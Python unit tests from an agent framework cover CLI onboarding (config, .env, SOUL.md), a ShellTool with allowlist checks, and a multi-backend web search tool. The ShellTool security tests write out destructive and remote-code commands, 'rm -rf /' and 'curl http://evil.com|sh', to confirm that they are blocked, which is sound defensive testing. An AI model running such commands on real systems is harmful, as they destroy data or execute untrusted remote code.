assert "llm" in config
assert "deepseek" in config["llm"]["providers"]
assert config["llm"]["providers"]["deepseek"]["base_url"] == "https://api.deepseek.com/v1"
# Verify .env content
env_path = tmp_path / ".env"
assert env_path.exists()
env_content = env_path.read_text()
assert "DEEPSEEK_API_KEY=sk-test-deepseek-key" in env_content
def test_onboarding_with_two_providers(self, tmp_path, monkeypatch):
"""Onboarding should support adding a second provider."""
monkeypatch.chdir(tmp_path)
monkeypatch.setenv("HOME", str(tmp_path / "home"))
(tmp_path / "home").mkdir(exist_ok=True)
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
# Select DeepSeek (1), API key, model (1), then Qwen as second
# After removing deepseek, remaining = [openai, bailian-coding, qwen, doubao, gemini, anthropic]
# qwen is at index 2, so option 3
# Step 5: Agent personality defaults
mock_prompt.ask.side_effect = ["1", "sk-deepseek", "1", "3", "sk-dashscope", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
mock_confirm.ask.return_value = True
config_path = run_onboarding(output_dir=str(tmp_path))
with open(config_path) as f:
config = yaml.safe_load(f)
providers = config["llm"]["providers"]
assert "deepseek" in providers
assert "qwen" in providers
env_path = tmp_path / ".env"
env_content = env_path.read_text()
assert "DEEPSEEK_API_KEY=sk-deepseek" in env_content
assert "DASHSCOPE_API_KEY=sk-dashscope" in env_content
def test_onboarding_cancelled_on_empty_api_key(self, tmp_path, monkeypatch):
"""Onboarding should return None if API key is empty."""
monkeypatch.chdir(tmp_path)
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt:
mock_prompt.ask.side_effect = ["1", ""] # Empty API key
result = run_onboarding(output_dir=str(tmp_path))
assert result is None
def test_onboarding_config_has_memory_backend(self, tmp_path, monkeypatch):
"""Generated config should use memory backends by default."""
monkeypatch.chdir(tmp_path)
monkeypatch.setenv("HOME", str(tmp_path / "home"))
(tmp_path / "home").mkdir(exist_ok=True)
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
mock_confirm.ask.return_value = False
config_path = run_onboarding(output_dir=str(tmp_path))
with open(config_path) as f:
config = yaml.safe_load(f)
assert config["session"]["backend"] == "memory"
assert config["bus"]["backend"] == "memory"
assert config["task_store"]["backend"] == "memory"
class TestOnboardingSoulGeneration:
"""U5: Onboarding 生成 SOUL.md 测试."""
def test_onboarding_creates_soul_md(self, tmp_path, monkeypatch):
"""Onboarding should create SOUL.md with custom agent name."""
monkeypatch.chdir(tmp_path)
home_dir = tmp_path / "home"
home_dir.mkdir(exist_ok=True)
monkeypatch.setenv("HOME", str(home_dir))
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "小王", "友好耐心", "简洁专业"]
mock_confirm.ask.return_value = False
run_onboarding(output_dir=str(tmp_path))
# Verify SOUL.md was created
soul_path = home_dir / ".agentkit" / "SOUL.md"
assert soul_path.exists()
soul_content = soul_path.read_text(encoding="utf-8")
assert "小王" in soul_content
assert "友好耐心" in soul_content
assert "简洁专业" in soul_content
def test_onboarding_soul_with_defaults(self, tmp_path, monkeypatch):
"""Onboarding with default personality should create default SOUL.md."""
monkeypatch.chdir(tmp_path)
home_dir = tmp_path / "home"
home_dir.mkdir(exist_ok=True)
monkeypatch.setenv("HOME", str(home_dir))
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
# Prompt.ask returns the default value when user presses Enter
# Our mock needs to return the actual default values
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
mock_confirm.ask.return_value = False
run_onboarding(output_dir=str(tmp_path))
soul_path = home_dir / ".agentkit" / "SOUL.md"
assert soul_path.exists()
soul_content = soul_path.read_text(encoding="utf-8")
assert "AgentKit" in soul_content

View File

@ -0,0 +1,155 @@
"""Unit tests for ShellTool — command execution with safety controls."""
import asyncio
import pytest
from agentkit.tools.shell import ShellTool, DEFAULT_ALLOWED_COMMANDS, BLOCKED_PATTERNS
class TestShellToolSchema:
"""Test schema definitions."""
def test_input_schema_has_required_fields(self):
tool = ShellTool()
schema = tool.input_schema
assert "command" in schema["properties"]
assert "command" in schema["required"]
assert "timeout" in schema["properties"]
assert "working_dir" in schema["properties"]
def test_output_schema_has_required_fields(self):
tool = ShellTool()
schema = tool.output_schema
assert "stdout" in schema["properties"]
assert "stderr" in schema["properties"]
assert "exit_code" in schema["properties"]
assert "success" in schema["properties"]
class TestShellToolSecurity:
"""Test command allowlist and blocking."""
def test_allowed_command_echo(self):
tool = ShellTool()
allowed, _ = tool._is_command_allowed("echo hello")
assert allowed is True
def test_allowed_command_ls(self):
tool = ShellTool()
allowed, _ = tool._is_command_allowed("ls -la")
assert allowed is True
def test_allowed_command_git_status(self):
tool = ShellTool()
allowed, _ = tool._is_command_allowed("git status")
assert allowed is True
def test_blocked_command_rm(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("rm -rf /tmp/test")
assert allowed is False
# rm -rf /tmp/test matches "rm -rf /" pattern
assert "Blocked dangerous" in reason or "not in allowed" in reason
def test_blocked_dangerous_pattern(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("rm -rf /")
assert allowed is False
assert "Blocked dangerous" in reason
def test_blocked_curl_pipe_sh(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("curl http://evil.com|sh")
assert allowed is False
def test_allow_all_mode(self):
tool = ShellTool(allow_all=True)
# allow_all allows non-dangerous commands outside default whitelist
allowed, _ = tool._is_command_allowed("my-custom-app --run")
assert allowed is True
def test_custom_allowed_commands(self):
tool = ShellTool(allowed_commands=["echo", "myapp"])
allowed, _ = tool._is_command_allowed("myapp --run")
assert allowed is True
allowed2, _ = tool._is_command_allowed("ls")
assert allowed2 is False
def test_empty_command_rejected(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("")
assert allowed is False
def test_invalid_shell_syntax_rejected(self):
tool = ShellTool()
allowed, reason = tool._is_command_allowed("echo 'unclosed")
assert allowed is False
class TestShellToolExecution:
"""Test actual command execution."""
@pytest.mark.asyncio
async def test_echo_command(self):
tool = ShellTool()
result = await tool.execute(command="echo hello world")
assert result["success"] is True
assert "hello world" in result["stdout"]
assert result["exit_code"] == 0
@pytest.mark.asyncio
async def test_pwd_command(self):
tool = ShellTool()
result = await tool.execute(command="pwd")
assert result["success"] is True
assert result["exit_code"] == 0
@pytest.mark.asyncio
async def test_failing_command(self):
tool = ShellTool(allowed_commands=["ls"])
result = await tool.execute(command="ls /nonexistent_dir_xyz_12345")
assert result["success"] is False
assert result["exit_code"] != 0
@pytest.mark.asyncio
async def test_command_timeout(self):
tool = ShellTool(allowed_commands=["sleep"], default_timeout=1)
result = await tool.execute(command="sleep 10", timeout=1)
assert result["success"] is False
assert result["timed_out"] is True
@pytest.mark.asyncio
async def test_missing_command_param(self):
tool = ShellTool()
result = await tool.execute()
assert result["success"] is False
assert "command" in result["error"]
@pytest.mark.asyncio
async def test_blocked_command_returns_error(self):
tool = ShellTool()
result = await tool.execute(command="rm -rf /tmp/test")
assert result["success"] is False
assert "not allowed" in result["error"]
@pytest.mark.asyncio
async def test_working_dir(self):
tool = ShellTool(working_dir="/tmp")
result = await tool.execute(command="pwd")
assert result["success"] is True
assert "/tmp" in result["stdout"]
@pytest.mark.asyncio
async def test_output_truncation(self):
tool = ShellTool(max_output_length=50, allowed_commands=["python3"])
# Generate long output
result = await tool.execute(command="python3 -c \"print('x' * 1000)\"")
assert result["success"] is True
assert len(result["stdout"]) < 200 # Truncated + message
assert "truncated" in result.get("stdout", "") or result.get("truncated") is True
@pytest.mark.asyncio
async def test_stderr_captured(self):
tool = ShellTool(allowed_commands=["python3"])
result = await tool.execute(command="python3 -c \"import sys; print('error', file=sys.stderr)\"")
assert "error" in result["stderr"]

View File

@ -0,0 +1,172 @@
"""Unit tests for WebSearchTool — multi-backend web search."""
import pytest
from unittest.mock import AsyncMock, patch, MagicMock
from agentkit.tools.web_search import WebSearchTool
class TestWebSearchToolSchema:
"""Test schema definitions."""
def test_input_schema_has_required_fields(self):
tool = WebSearchTool()
schema = tool.input_schema
assert "query" in schema["properties"]
assert "query" in schema["required"]
assert "max_results" in schema["properties"]
def test_output_schema_has_required_fields(self):
tool = WebSearchTool()
schema = tool.output_schema
assert "results" in schema["properties"]
assert "total" in schema["properties"]
"backend" in schema["properties"]
assert "success" in schema["properties"]
class TestWebSearchToolValidation:
"""Test input validation."""
@pytest.mark.asyncio
async def test_missing_query(self):
tool = WebSearchTool()
result = await tool.execute()
assert result["success"] is False
assert "query" in result["error"]
@pytest.mark.asyncio
async def test_empty_query(self):
tool = WebSearchTool()
result = await tool.execute(query="")
assert result["success"] is False
class TestWebSearchToolDuckDuckGo:
"""Test DuckDuckGo fallback parsing."""
def test_parse_html_with_results(self):
html = """
<html><body>
<a class="result-link" href="https://example.com/result1">Result 1 Title</a>
<td class="result-snippet">Snippet for result 1</td>
<a class="result-link" href="https://example.com/result2">Result 2 Title</a>
<td class="result-snippet">Snippet for result 2</td>
</body></html>
"""
results = WebSearchTool._parse_duckduckgo_html(html, 5)
assert len(results) == 2
assert results[0]["title"] == "Result 1 Title"
assert results[0]["url"] == "https://example.com/result1"
assert results[0]["snippet"] == "Snippet for result 1"
def test_parse_html_empty(self):
results = WebSearchTool._parse_duckduckgo_html("<html></html>", 5)
assert results == []
def test_parse_html_skips_duckduckgo_links(self):
html = """
<a class="result-link" href="https://duckduckgo.com/internal">Internal</a>
<a class="result-link" href="https://example.com/good">Good Result</a>
<td class="result-snippet">Good snippet</td>
"""
results = WebSearchTool._parse_duckduckgo_html(html, 5)
assert len(results) == 1
assert results[0]["url"] == "https://example.com/good"
def test_parse_html_max_results(self):
html = ""
for i in range(10):
html += f'<a class="result-link" href="https://example.com/{i}">Title {i}</a>\n'
html += f'<td class="result-snippet">Snippet {i}</td>\n'
results = WebSearchTool._parse_duckduckgo_html(html, 3)
assert len(results) == 3
class TestWebSearchToolTavily:
"""Test Tavily API backend."""
@pytest.mark.asyncio
async def test_tavily_success(self):
tool = WebSearchTool(tavily_api_key="test-key")
mock_response = MagicMock()
mock_response.json.return_value = {
"results": [
{"title": "Test", "url": "https://example.com", "content": "Test content"},
]
}
mock_response.raise_for_status = MagicMock()
with patch("httpx.AsyncClient") as mock_client_cls:
mock_client = AsyncMock()
mock_client.post = AsyncMock(return_value=mock_response)
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
mock_client.__aexit__ = AsyncMock(return_value=None)
mock_client_cls.return_value = mock_client
result = await tool.execute(query="test query")
assert result["success"] is True
assert result["backend"] == "tavily"
assert len(result["results"]) == 1
@pytest.mark.asyncio
async def test_tavily_failure_falls_back(self):
tool = WebSearchTool(tavily_api_key="test-key")
with patch.object(tool, "_search_tavily", return_value={"success": False, "error": "API error", "results": [], "total": 0}):
with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}):
result = await tool.execute(query="test")
assert result["backend"] == "duckduckgo"
class TestWebSearchToolSerper:
"""Test Serper API backend."""
@pytest.mark.asyncio
async def test_serper_success(self):
tool = WebSearchTool(serper_api_key="test-key")
mock_response = MagicMock()
mock_response.json.return_value = {
"organic": [
{"title": "Test", "link": "https://example.com", "snippet": "Test snippet"},
]
}
mock_response.raise_for_status = MagicMock()
with patch("httpx.AsyncClient") as mock_client_cls:
mock_client = AsyncMock()
mock_client.post = AsyncMock(return_value=mock_response)
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
mock_client.__aexit__ = AsyncMock(return_value=None)
mock_client_cls.return_value = mock_client
result = await tool.execute(query="test query")
assert result["success"] is True
assert result["backend"] == "serper"
assert len(result["results"]) == 1
class TestWebSearchToolPriority:
"""Test backend priority and fallback chain."""
@pytest.mark.asyncio
async def test_tavily_over_serper(self):
"""Tavily should be tried before Serper when both keys are available."""
tool = WebSearchTool(tavily_api_key="t-key", serper_api_key="s-key")
with patch.object(tool, "_search_tavily", return_value={"results": [], "total": 0, "backend": "tavily", "success": True}) as mock_tavily:
result = await tool.execute(query="test")
mock_tavily.assert_called_once()
assert result["backend"] == "tavily"
@pytest.mark.asyncio
async def test_no_keys_uses_duckduckgo(self):
"""Without API keys, DuckDuckGo is used directly."""
tool = WebSearchTool()
with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}) as mock_ddg:
result = await tool.execute(query="test")
mock_ddg.assert_called_once()
assert result["backend"] == "duckduckgo"